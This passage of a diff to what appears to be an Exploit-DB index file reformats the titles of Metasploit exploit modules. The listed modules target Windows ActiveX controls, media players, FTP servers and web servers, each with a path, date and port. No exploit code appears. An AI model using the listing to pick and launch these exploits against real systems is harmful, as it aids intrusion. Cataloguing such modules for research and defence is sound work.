+16598,platforms/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal",2010-11-11,Metasploit,windows,remote,0 16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption",2010-07-12,Metasploit,windows,remote,0 -16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 -16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16602,platforms/windows/remote/16602.rb,"Macrovision InstallShield Update Service ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 +16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 +16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16602,platforms/windows/remote/16602.rb,"Macrovision InstallShield Update Service - ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 -16604,platforms/windows/remote/16604.rb,"WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 -16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",2010-09-20,Metasploit,windows,remote,0 +16604,platforms/windows/remote/16604.rb,"WebEx UCF - atucfobj.dll ActiveX NewObject Method Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download",2010-09-20,Metasploit,windows,remote,0 16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (1)",2010-04-30,Metasploit,windows,local,0 16607,platforms/windows/remote/16607.rb,"WinZip FileView - (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,Metasploit,windows,remote,0 -16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution",2010-09-20,Metasploit,windows,remote,0 +16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - (msvidctl.dll) MPEG-2 Memory Corruption",2010-04-30,Metasploit,windows,local,0 -16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN - NetExtender ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16617,platforms/windows/local/16617.rb,"VUPlayer - (.m3u) Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 @@ -14425,48 +14425,48 @@ id,file,description,date,author,platform,type,port 16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,Metasploit,windows,local,0 16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use-After-Free (2)",2010-09-25,Metasploit,windows,local,0 16624,platforms/windows/local/16624.rb,"Adobe - util.printf() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record",2010-09-25,Metasploit,windows,local,0 +16625,platforms/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record",2010-09-25,Metasploit,windows,local,0 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - (.pls) Stack Buffer Overflow",2010-01-28,Metasploit,windows,local,0 -16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16627,platforms/windows/local/16627.rb,"UltraISO - .CUE File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16629,platforms/windows/local/16629.rb,"VideoLAN VLC TiVo Buffer Overflow",2011-02-02,Metasploit,windows,local,0 -16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16629,platforms/windows/local/16629.rb,"VideoLAN VLC - TiVo Buffer Overflow",2011-02-02,Metasploit,windows,local,0 +16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (1)",2010-09-25,Metasploit,windows,local,0 16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16634,platforms/windows/local/16634.rb,"Free Download Manager Torrent Parsing Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - (.pls) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16637,platforms/windows/local/16637.rb,"VideoLAN VLC MKV Memory Corruption",2011-02-08,Metasploit,windows,local,0 -16638,platforms/windows/remote/16638.rb,"DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,Metasploit,windows,remote,0 -16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16637,platforms/windows/local/16637.rb,"VideoLAN VLC - MKV Memory Corruption",2011-02-08,Metasploit,windows,local,0 +16638,platforms/windows/remote/16638.rb,"DjVu - DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,Metasploit,windows,remote,0 +16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16640,platforms/windows/local/16640.rb,"FeedDemon 3.1.0.12 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,Metasploit,windows,remote,0 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - (.DWB) Stack Buffer Overflow",2010-04-05,Metasploit,windows,local,0 -16645,platforms/windows/local/16645.rb,"URSoft W32Dasm Disassembler Function Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 -16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (2)",2010-09-25,Metasploit,windows,local,0 -16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,Metasploit,windows,remote,0 +16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,Metasploit,windows,remote,0 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (2)",2010-09-25,Metasploit,windows,local,0 -16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow",2010-03-09,Metasploit,windows,local,0 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (.PSH) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,Metasploit,windows,local,0 +16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer - Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow",2010-09-25,Metasploit,aix,dos,0 16658,platforms/windows/local/16658.rb,"VUPlayer - (.cue) Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow",2010-11-24,Metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,Metasploit,windows,local,0 16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow Exploit",2010-09-25,Metasploit,windows,local,0 16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16666,platforms/windows/local/16666.rb,"UltraISO CCD File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16666,platforms/windows/local/16666.rb,"UltraISO - .CCD File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution",2010-11-01,Metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client Buffer Overflow",2010-11-14,Metasploit,windows,local,0 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,Metasploit,windows,local,0 @@ -14478,25 +14478,25 @@ id,file,description,date,author,platform,type,port 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - (.DBR) Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (2)",2011-01-08,Metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA Antivirus Engine CAB Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",2010-09-20,Metasploit,windows,local,0 +16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) - (Win32) smb:// URI Buffer Overflow",2010-09-20,Metasploit,windows,local,0 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,Metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic VBP Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0 16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (3)",2010-09-25,Metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,Metasploit,windows,local,0 -16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,Metasploit,windows,remote,0 +16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow",2010-11-05,Metasploit,windows,remote,0 16686,platforms/windows/local/16686.rb,"Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,Metasploit,windows,local,0 16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,Metasploit,windows,local,0 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (.pls) Stack Buffer Overflow",2010-11-24,Metasploit,windows,local,0 16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow",2010-04-30,Metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,Metasploit,windows,remote,80 -16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",2010-09-20,Metasploit,windows,remote,3128 +16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow",2010-09-20,Metasploit,windows,remote,3128 16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 - 'secure' Overflow (Windows)",2010-09-20,Metasploit,windows,remote,7787 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 beta 5 - Buffer Overflow",2010-09-20,Metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault getinfo Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,12203 -16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,1533 +16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,Metasploit,windows,remote,80 16698,platforms/windows/remote/16698.rb,"Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,Metasploit,windows,remote,0 @@ -14506,23 +14506,23 @@ id,file,description,date,author,platform,type,port 16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server - Input Overflow",2010-10-05,Metasploit,windows,remote,0 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 -16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 Password Overflow",2010-07-03,Metasploit,windows,remote,0 +16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 - Password Overflow",2010-07-03,Metasploit,windows,remote,0 16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - Username Overflow",2010-07-03,Metasploit,windows,remote,0 16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,Metasploit,windows,remote,0 -16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,Metasploit,windows,remote,0 -16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow Exploit",2010-07-03,Metasploit,windows,remote,0 +16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String",2010-06-22,Metasploit,windows,remote,21 16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,Metasploit,windows,remote,0 -16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,Metasploit,windows,remote,2100 +16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB - FTP UNLOCK Overflow (Win32)",2010-10-05,Metasploit,windows,remote,2100 16715,platforms/windows/remote/16715.rb,"Serv-U FTPD - MDTM Overflow",2010-09-20,Metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow",2010-04-30,Metasploit,windows,remote,0 -16718,platforms/windows/remote/16718.rb,"Xlink FTP Server Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16719,platforms/windows/remote/16719.rb,"WS-FTP Server 5.03 MKD Overflow",2010-10-05,Metasploit,windows,remote,21 +16718,platforms/windows/remote/16718.rb,"Xlink FTP Server - Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16719,platforms/windows/remote/16719.rb,"WS-FTP Server 5.03 - MKD Overflow",2010-10-05,Metasploit,windows,remote,21 16720,platforms/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 -16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16722,platforms/windows/remote/16722.rb,"Xlink FTP Client - Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,Metasploit,windows,remote,0 16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,Metasploit,windows,remote,0 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,Metasploit,windows,remote,0 @@ -14531,7 +14531,7 @@ id,file,description,date,author,platform,type,port 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd LIST Concatenation Overflow",2010-10-05,Metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - Username Overflow",2010-09-20,Metasploit,windows,remote,0 -16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0 +16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB - FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0 @@ -14539,13 +14539,13 @@ id,file,description,date,author,platform,type,port 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 -16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit",2010-04-30,Metasploit,windows,remote,21 +16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow Exploit",2010-04-30,Metasploit,windows,remote,21 16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server NLST Response Overflow",2010-11-12,Metasploit,windows,remote,21 -16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 SIZE Overflow",2010-06-22,Metasploit,windows,remote,0 +16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow",2010-06-22,Metasploit,windows,remote,0 16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow",2010-05-09,Metasploit,windows,remote,0 16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 -16744,platforms/windows/remote/16744.rb,"Computer Associates License Client GETCONFIG Overflow",2010-09-20,Metasploit,windows,remote,10203 -16745,platforms/windows/remote/16745.rb,"Computer Associates License Server GETCONFIG Overflow",2010-09-20,Metasploit,windows,remote,10202 +16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow",2010-09-20,Metasploit,windows,remote,10203 +16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow",2010-09-20,Metasploit,windows,remote,10202 16746,platforms/windows/remote/16746.rb,"SentinelLM UDP Buffer Overflow",2010-05-09,Metasploit,windows,remote,5093 16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service Path Overflow",2010-05-09,Metasploit,windows,remote,2103 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)",2010-07-25,Metasploit,windows,remote,0 @@ -14553,36 +14553,36 @@ id,file,description,date,author,platform,type,port 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service DNS Name Path Overflow",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow",2010-04-30,Metasploit,win_x86,remote,0 16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite - LDAP protocol Buffer Overflow",2010-02-15,Metasploit,windows,remote,80 -16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,Metasploit,windows,remote,80 +16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server - If-Modified-Since Overflow",2010-08-25,Metasploit,windows,remote,80 16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,Metasploit,windows,remote,8080 16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,Metasploit,windows,remote,80 -16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,Metasploit,windows,remote,8300 -16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,Metasploit,windows,remote,9999 +16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 - Accept-Language Overflow",2010-09-20,Metasploit,windows,remote,8300 +16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 - WebTools Buffer Overflow",2010-07-16,Metasploit,windows,remote,9999 16759,platforms/win_x86/remote/16759.rb,"SHTTPD 1.34 - URI-Encoded POST Request Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,Metasploit,windows,remote,80 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - EXT.dll Buffer Overflow",2010-07-07,Metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic JSESSIONID Cookie Value Overflow",2010-07-03,Metasploit,windows,remote,80 16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 - Header Overwrite (Win32)",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 -16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM Database Parameter Overflow",2010-09-20,Metasploit,windows,remote,9999 +16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",2010-07-13,Metasploit,windows,remote,8008 +16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow",2010-07-13,Metasploit,windows,remote,8008 16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,Metasploit,windows,remote,0 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028 -16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 +16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 16775,platforms/windows/webapps/16775.rb,"Rhinosoft Serv-U Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,webapps,0 -16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0 +16776,platforms/windows/remote/16776.rb,"Alt-N 